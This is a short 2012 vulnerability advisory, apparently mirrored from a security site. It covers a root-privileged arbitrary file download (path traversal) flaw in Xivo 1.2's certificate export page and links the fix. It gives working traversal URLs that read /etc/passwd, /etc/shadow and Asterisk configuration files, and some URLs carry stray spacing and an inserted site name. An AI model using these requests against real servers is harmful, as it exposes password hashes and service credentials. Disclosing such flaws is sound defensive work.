Xivo 1.2 arbitrary File Download-vulnerability warning-the black bar safety net

2012-11-19T00:00:00
ID MYHACK58:62201235614
Type myhack58
Reporter 佚名
Modified 2012-11-19T00:00:00

Description

Xivo 1.2 Arbitrary File Download under root privileges

Author : Mr. Un1k0d3r

Developer: https://wiki.xivo.fr

Download address: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CD

Effect version: 1.2 (last patched version)

Test version: Linux xivo 2.6.32-5-4 8 6

Test using:

Using the web interface you can download any file from the system. The web application is running under root privileges.

You can download clear text password, the /etc/passwd, /etc/shadow and many more...

Using the method:

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd

https:// www.2cto.com /xivo/configuration/index. php/manage/certificate/? act=export&id=../../../../etc/shadow

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/manager. conf

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/cel_pgsql. conf

Defect discoverer Mr. Un1k0d3r From RingZer0 Team.

Comment:

This appears to have been fixed

https://projects.xivo.fr/issues/3912

http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19